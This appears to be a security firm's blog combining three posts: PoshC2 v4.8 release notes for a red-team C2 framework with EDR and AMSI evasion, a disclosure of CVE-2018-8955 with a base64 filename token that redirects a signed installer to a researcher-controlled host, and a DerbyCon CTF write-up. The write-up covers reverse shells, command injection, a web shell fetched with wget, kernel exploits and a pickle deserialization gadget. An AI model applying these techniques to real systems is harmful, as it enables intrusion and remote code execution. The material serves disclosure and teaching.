Introducing PoshC2 v4.8 – includes C# dropper, task management and more! – Part One

We recently released version 4.8 of PoshC2, which includes a number of fixes and improvements that help facilitate simulated attacks. This is the first post in a series covering the details of those fixes and updates, as well as some of the other cool features we have been working on in the background.

C Sharp (C#)

As of PoshC2 version 4.6, a C# implant has been available. The main driver behind this implementation was to steer clear of System.Management.Automation.dll in heavily monitored environments where an EDR product can detect the modules loaded inside a running process. Granted, not all EDR products currently do this, as it can incur a performance hit at the endpoint, but it's important to understand the OPSEC implications of running different C2 droppers.

This has been a work in progress since its release and is continually improving; we believe it will be the way forward in the months to come against advanced blue teams with a good detection and response capability across the organisation. The implant is currently fully functional and allows an operator to load any C# assembly and execute it in the running process. This massively extends the available functionality, because operators can load the great modules created by other infosec authors out in the wild. Loading is performed via the System.Reflection namespace: the code searches the current AppDomain for the assembly by name and attempts to run either the given entry point or the main method of the executable. Example usage is as follows, for both run-exe and run-dll:
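For readers less familiar with reflective loading, the same load-and-invoke-by-name pattern can be sketched in Python (a hypothetical cross-language analogy, not PoshC2 code):

```python
import importlib.util

def run_module(path, module_name, entry_point="main", *args):
    """Load a module from disk at runtime and invoke a named entry point --
    loosely analogous to loading an assembly into the AppDomain and calling
    its entry point (or Main) via System.Reflection."""
    spec = importlib.util.spec_from_file_location(module_name, path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)          # bring the code into the process
    func = getattr(module, entry_point)      # look the entry point up by name
    return func(*args)
```

In the C# implant the equivalent lookup walks the current AppDomain for the assembly by name before invoking the requested entry point.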



Task Management

One of the issues we’ve overcome in this release was around tracking tasks; there was no way to determine which output related to which issued command. This was largely because the implant did not use task IDs that were tracked throughout the entire command process flow.

Typically this was fine, because you know what command you’re running, but when multiple people are working on the same instance, or when several similar commands are run, it could be difficult to figure out which output came from which command. It also made failed commands hard, if not impossible, to track down. The following screenshots show the output inside the C2Server and the CompletedTasks HTML file:

Figure 1: How commands were issued and returned against an implant

Figure 2: The old format of the tasks report

Furthermore, tasks were only logged in the database when the implant responded with some output. Now, tasks are inserted as soon as they are picked up by the implant with a start time, and updated with a completed time and the desired output when they return. This allows us to track tasks even if they kill the implant or error and never return, and to see how long they took. It also allows us to reference tasks by ID, allowing us to match them in the C2Server log and to only refer to the task by its ID in the response, decreasing message length and improving operational security. An example of the output is shown below:

Figure 3: The new task logging

The generated report then looks like this:

Figure 4: The new report format
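Conceptually, the new task lifecycle looks like this (an illustrative sqlite3 sketch with a made-up schema, not PoshC2's actual code):

```python
import sqlite3
from datetime import datetime, timezone

conn = sqlite3.connect(":memory:")
conn.execute("""CREATE TABLE Tasks (
    TaskID INTEGER PRIMARY KEY,
    ImplantID INTEGER,
    Command TEXT,
    User TEXT,
    Output TEXT,
    SentTime TEXT,
    CompletedTime TEXT)""")

def task_picked_up(implant_id, command, user):
    """Insert the task with a start time as soon as the implant picks it up."""
    now = datetime.now(timezone.utc).isoformat()
    cur = conn.execute(
        "INSERT INTO Tasks (ImplantID, Command, User, SentTime) VALUES (?, ?, ?, ?)",
        (implant_id, command, user, now))     # prepared statement
    return cur.lastrowid                      # the ID referenced in the C2 log

def task_completed(task_id, output):
    """Update the same row with the output and a completed time on response."""
    now = datetime.now(timezone.utc).isoformat()
    conn.execute(
        "UPDATE Tasks SET Output = ?, CompletedTime = ? WHERE TaskID = ?",
        (output, now, task_id))
```

A task that errors or kills the implant simply keeps a NULL completed time, which is exactly what makes it trackable.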

User Logging

The astute amongst you will have noticed the new User column in the report above. Another improvement that has been made in relation to tracking tasks is user logging. Now when you start the ImplantHandler you are prompted for a username; it is possible to leave this blank if required, but when PoshC2 is being used as a centralised C2Server with multiple users it’s important to track which user ran which task as shown in the examples below:

Figure 5: You are now prompted for a username when you start the ImplantHandler

All tasks issued from that ImplantHandler instance will be logged as that user, both in the C2Server log and in the report.

Figure 6: If a username is set it is logged in the task output

Figure 7: The username is also logged for the task in the report

For scripting and/or ease of use, the ImplantHandler can also be started with the -u or --user option, which sets the username, avoiding the prompt:

python --user "bobby b"

Beacon Timing

The way beacon sleep times were handled was inconsistent between implant types, so we’ve standardised it. All beacon times must now be given as a value and a unit, such as 5m, 10s or 2h, and are displayed in that format for all implant types in the ImplantHandler. In the old output below, the fourth column states the current beacon time in seconds, whereas now only the new format is shown.

Figure 8: The old beacon time format

Figure 9: The new beacon time format

Validation has also been added for these, so attempting to set an invalid beacon time will print a suitable error message and do nothing.

Figure 10: The validation message if an invalid format is set
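A minimal version of that parser and its validation might look like this (our sketch, not PoshC2's actual code):

```python
import re

# Accepts the value-plus-unit format described above, e.g. 50s, 10m or 2h.
BEACON_RE = re.compile(r"^(\d+)([smh])$")
UNITS = {"s": 1, "m": 60, "h": 3600}

def parse_beacon(value):
    """Return the beacon interval in seconds, or None if the format is invalid."""
    match = BEACON_RE.match(value.strip().lower())
    if not match:
        return None
    number, unit = match.groups()
    return int(number) * UNITS[unit]
```

Anything that does not match the pattern is rejected before it ever reaches the implant.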

We’ve also changed the implant colour coding so that implants are only flagged as timing out if they haven’t checked in for a multiple of their beacon time, as opposed to a hard-coded value.

Previously the implants would be coloured as yellow if they hadn’t checked in for 10 minutes or more, and red for 60 minutes or more. Now they are coloured yellow if they have not checked in for 3x beacon time, and red for 10x beacon time, granting far more accurate and timely feedback to the operator.

Figure 11: Implant colour coding has been improved so that the colour is dependent on the beacon time
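The rule is simple enough to state in a few lines (a sketch of the logic, not PoshC2's actual code):

```python
def implant_colour(seconds_since_checkin, beacon_seconds):
    """New highlighting rule: yellow once an implant has been quiet for 3x
    its beacon time, red at 10x (previously hard-coded to 10/60 minutes
    regardless of the configured beacon)."""
    if seconds_since_checkin >= 10 * beacon_seconds:
        return "red"
    if seconds_since_checkin >= 3 * beacon_seconds:
        return "yellow"
    return "normal"
```

A 5s beacon now goes red after under a minute of silence, while a 2h beacon stays green all day, which matches how an operator actually thinks about check-ins.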

C2Viewer
The C2Viewer was a legacy script used to just print the C2Server log, useful when multiple people want to be able to view and manipulate the output independently.

There were a few issues with the implementation, however; in particular it could miss output because it polled the database. As a separate script, it also added a maintenance burden whenever task output changed.

This file has now been removed, and instead if you want to view the output in the same way, we recommend that you run the C2Server and pipe it to a log file. You can print the log to stdout and a log file using tee:

python -u | tee -a /var/log/poshc2_server.log

This output can then be viewed and manipulated by anyone, such as by using tail:

tail -f -n 50 /var/log/poshc2_server.log

This method has the added benefit of storing all server output. While all relevant data is stored in the database, having a backup of the output actually seen in the log during usage can be extremely useful.

Further details can be found in the

Internal Refactoring

We’re also making strides to improve the internals of PoshC2, refactoring files for clarity and cutting cyclic dependencies. We aim to modularise the entire code base to make it more accessible and easier to maintain and change, but as this is a sizeable undertaking we’ll be doing it incrementally to limit the impact.


There have been quite a few changes made, and we’re aiming to not only improve the technical capabilities of PoshC2, but also the usability and maintainability.

Naturally, any changes come with a risk of breaking things no matter how thorough the testing, so please report any issues found on the GitHub page at:

The full list of changes is below, but as always keep an eye on the changelog, which we update with the changes in each version to make tracking easier. This is the first post in a series on additional features and capability within PoshC2. Stay tuned for more information.

  • Insert tasks when first picked up by the implant with start time
  • Update task when response returned with output and completed time
  • Log task ID in task sent/received
  • Add ability to set username and associate username to tasks issued
  • Print user in task information when the username is not empty
  • Improved error handling and logging
  • Rename CompletedTasks table to Tasks table
  • Method name refactoring around above changes
  • Pull out implant cores into
  • Rename 2nd stage cores into
  • Stage2-Core.ps1 (previously Implant-Core.ps1 ) is no longer flagged by AMSI
  • Use prepared statements in the DB
  • Refactoring work to start to break up dependency cycle
  • Rename DB to Database in to avoid name clashes
  • Pull some dependency-less functions into to aid dependency management
  • Fix download-file so that if the same file is downloaded multiple times it is saved as name-1.ext, name-2.ext, etc.
  • Adjust user/host printing to always be domain\username @ hostname in implants & logs
  • Fix CreateRawBase payload creation, used in gzip powershell stager and commands like get-system
  • Added ImplantID to Tasks table as a foreign key, so it’s logged in the Tasks report
  • Added for testing checklist/methodology
  • Fix Get-ScreenshotAllWindows to return correct file extension
  • Fix searchhelp for commands with caps
  • Implant timeout highlighting is now based on beacon time – yellow if it’s not checked in for 3x beacon time and red if not checked in for 10x beacon time
  • Setting and viewing beacon time is now consistent across config and implant types – always 50s/10m/1h format
  • Added validation for beacon time that it matches the correct format
  • Fix StartAnotherImplant command for python implant
  • Rename RandomURI column in html output to Context, and print it as domain\username @ hostname
  • Move service instructions to readme so that poshc2.service can just be copied to /lib/systemd/system
  • Removed and added instructions for same functionality to readme just using system commands
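As an aside, the download-file renaming fix above can be sketched as follows (illustrative, not PoshC2's implementation):

```python
from pathlib import Path

def unique_download_path(directory, filename):
    """If name.ext already exists in the loot directory, fall back to
    name-1.ext, name-2.ext and so on instead of overwriting."""
    candidate = Path(directory) / filename
    stem, suffix = candidate.stem, candidate.suffix
    counter = 1
    while candidate.exists():
        candidate = Path(directory) / f"{stem}-{counter}{suffix}"
        counter += 1
    return candidate
```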

CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:
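Recovering it is a one-liner with a URL-safe base64 decode (the exact filename-safe alphabet Bitdefender uses is our assumption; a strict URL-safe decode renders one separator character slightly differently):

```python
import base64

# The base64 token lifted from the installer's filename.
encoded = ("aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20v"
           "UGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==")
decoded = base64.urlsafe_b64decode(encoded).decode()
print(decoded)  # https://cloudgz-ecs.gravityzone.bitdefender.com/...
```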


Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe

The base64 in that filename was modified to contain the URL:


We reran the installer and the results are shown below.
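Decoding the replacement token shows the URL under our control, and the same transformation in reverse is all that is needed to craft a hostile filename:

```python
import base64

# The modified token from the renamed installer above.
token = "aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s"
url = base64.b64decode(token).decode()
print(url)  # http://thiscantbetrue.com/installer.xml

# Round trip: encoding the URL reproduces the token embedded in the filename.
crafted = f"setupdownloader_[{base64.b64encode(url.encode()).decode()}].exe"
```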

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point we used a simple trick to avoid staring at encrypted HTTPS traffic: we restored the original download URL in installer.xml, but replaced HTTPS with HTTP.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that will be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called “Installer.exe”: <run_command params="" proc="Installer.exe" />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.
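Since the setup only verifies an MD5 listed in data.xml, a swapped-in binary simply needs its own MD5 published alongside it; computing one is trivial (illustrative sketch):

```python
import hashlib

def md5_for_listing(path):
    """Compute the MD5 of a payload, as an attacker would when editing the
    file list in data.xml to reference their own executable."""
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

This is also a reminder that MD5 here only provides an integrity check against corruption, not any guarantee of origin.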

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.


We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be undermined by poor implementation decisions made later.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new patched installers and went through a certificate revocation process of the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates is as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificate revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years, we’ve written up an analysis of a small number of the challenges we faced.

Previous Write Ups

Here are the write ups from previous years:




This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. It was possible to use the mail service's VRFY command to confirm susan as a user on the system, and to use the service to send email. Some time was spent sending email internally, with no results.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the correct pair of credentials had been passed to the server during multiple earlier brute-force attempts.

We will come back to Susan later in this post…


There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in Elasticsearch 1.1.1 which allows for remote code execution. An exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, an exploit that adds the account firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags, however of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above; others included grub.config and authorized_keys files. One of the more fun flags was saved in the user’s home directory as Pictures/Wallpapers/Untitled.png. VNC was running on localhost and we saw a number of people port forwarding through the box to view it, but we simply downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.


We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to – the flag for this challenge.


It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the user's input was compared to a reference string (which looked like a mangled email address) in the following fashion:

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.
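The traversal order those steps describe can be sketched in a few lines of Python (our reconstruction of the disassembly):

```python
def comparison_order(user_input):
    """Walk the input string in the order the binary compares it against
    the reference string: last character first, then every 13th character
    backwards, restarting one position earlier each pass."""
    ordered = []
    length = len(user_input)
    for offset in range(13):          # 13 non-overlapping starting points
        index = length - 1 - offset   # last, then penultimate, character...
        while index >= 0:
            ordered.append(user_input[index])
            index -= 13               # skip backwards 13 characters
    return "".join(ordered)
```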

Knowing the comparison algorithm, one could reverse it until this challenge's flag was identified. However, under the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:
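The filter itself needs little more than a set comparison (a sketch with made-up strings; characters may be reused, which is why this is a set rather than multiset check):

```python
def possible_flags(candidates, reference):
    """Keep only candidates that can be written using characters that
    appear somewhere in the reference string."""
    allowed = set(reference)
    return [c for c in candidates if set(c) <= allowed]
```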


This was the flag for this challenge.

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:


Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed the file was encoded using a rotating single-byte XOR key: every byte of the file was XOR'ed with the key, which was then incremented by 0x07. The original XOR key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:
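Our brute forcer amounted to something like the following (a reconstruction of the approach, not the exact script we used):

```python
def xor_decode(data, key):
    """Rotating single-byte XOR: each byte is XOR'ed with the key, which is
    then incremented by 0x07 (mod 256). XOR is symmetric, so this both
    encodes and decodes."""
    out = bytearray()
    for byte in data:
        out.append(byte ^ key)
        key = (key + 0x07) & 0xFF
    return bytes(out)

def brute_force(data):
    # Only 256 possible initial keys, so try them all and keep the
    # candidates that decode to printable text.
    for key in range(256):
        candidate = xor_decode(data, key)
        if all(32 <= b < 127 or b in (9, 10, 13) for b in candidate):
            yield key, candidate
```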



There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is an open source software written in Java that has a known exploitation path by use of the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.

Access to a root shell was gained by breaking out of the less program. Within the sudoers file, the Jenkins user was permitted to run less against the syslog file without a password. Once a root shell was obtained, the CTF user's password was recovered from the .bash_history file. This user was defined in the sudoers file as having full root permissions, and the account allowed us to access the SSH service directly, bypassing Jenkins, and to gain the rest of the flags on the host.


We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in the context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege-escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following request file and fed it into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

Sqlmap creates an upload file when the --os-shell flag is used. This was particularly useful, as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.


Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path. Apparently there was a WordPress username – djohnston – embedded in the HTML comments somewhere, and that user had a password of Password1 for wp-admin. Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenge included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status, as it was available to localhost. Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in that directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As the file executed system commands, we were able to append a semi-colon to terminate the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell, which was downloaded to the WordPress server using wget.

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in the context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo group, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the application's MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reverse proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, they were POSTed to the /Login page. This set a cookie called session and then triggered a redirect to /Chat. Examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookie's value and obtained the following output.

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.
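The decoding step itself is straightforward; a sketch against a made-up cookie (the real cookie's field layout is not reproduced here):

```python
import base64
from urllib.parse import unquote

def decode_session_cookie(cookie):
    """Split a colon-delimited session cookie and attempt to base64-decode
    each part, leaving any non-base64 parts as raw bytes."""
    decoded = []
    for part in unquote(cookie).split(":"):
        try:
            padded = part + "=" * (-len(part) % 4)   # restore stripped padding
            decoded.append(base64.b64decode(padded))
        except Exception:
            decoded.append(part.encode())
    return decoded
```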

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network ( instead of

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.
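The script amounted to little more than the following (the endpoint URL, form field and cookie name here are placeholders, not the real scoreboard's):

```python
from urllib.parse import urlencode
from urllib.request import Request, urlopen

def load_flags(path):
    """Read one flag per line, dropping blanks and duplicates."""
    with open(path) as f:
        flags = [line.strip() for line in f if line.strip()]
    return list(dict.fromkeys(flags))     # de-duplicate, keep order

def submit_all(flags, url, session_cookie):
    # Placeholder endpoint and field name -- the real scoreboard differed.
    for flag in flags:
        data = urlencode({"flag": flag}).encode()
        request = Request(url, data=data,
                          headers={"Cookie": f"session={session_cookie}"})
        with urlopen(request) as response:
            print(flag, response.status)
```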

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of a MAC, utilising some form of strong server-side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.
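Python's pickle module makes a convenient analogue for this (the challenge itself was Ruby, and this is not the gadget we used – just a minimal demonstration of the principle). The serialized bytes can name an arbitrary callable and its arguments, and the loader will invoke it while rebuilding the object graph:

```python
import os
import pickle

class Gadget:
    """The serialized form can name any callable plus its arguments;
    pickle invokes it while reconstructing the object graph."""
    def __reduce__(self):
        # Benign demonstration: have the loader call os.getcwd().
        # An attacker would name something like os.system instead.
        return (os.getcwd, ())

payload = pickle.dumps(Gadget())
result = pickle.loads(payload)   # os.getcwd() runs during deserialization
print(result)
```

The data never contains code, only the *name* of a callable, which is exactly why deserializing untrusted input is dangerous.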

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickles” enough:

Ruby on Rails has gadgets for RCE via deserialization through ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in, the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and an identToken. Doing some research, we found that these classes are part of the SHIPS toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definitions for IdentLDAP and IdentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try and mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment, for which we used an online code testing environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the identType and identToken here was a string that should execute the ping command:
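Python's pickle has the same property, which makes for a compact illustration (again an analogue – the challenge used Ruby's Marshal, and the attribute names below simply mirror the write-up). The serialized blob carries only the class name and an attribute dictionary; any locally defined class with a matching name will happily absorb the values:

```python
import pickle

class User:
    """A stand-in for the application's User class; only the
    module-qualified name has to match at load time."""
    pass

mock = User()
mock.identType = "ping 127.0.0.1"   # attacker-chosen values travel as plain data
mock.identToken = "ping 127.0.0.1"

blob = pickle.dumps(mock)           # only the class name + attribute dict are stored
restored = pickle.loads(blob)
print(restored.identType, restored.identToken)
```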

Here is the serialized and encoded form.

And here are the pings coming back after sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.


Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post-foothold against the internal network. The first was an ARP scan of the network, as shown below. This identified two additional hosts; one of them sat on the inside of the dd-wrt host and was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a port scan to find out whether any additional ports were open from the domain controller. However, it appeared that all ports were available to both hosts on the network.

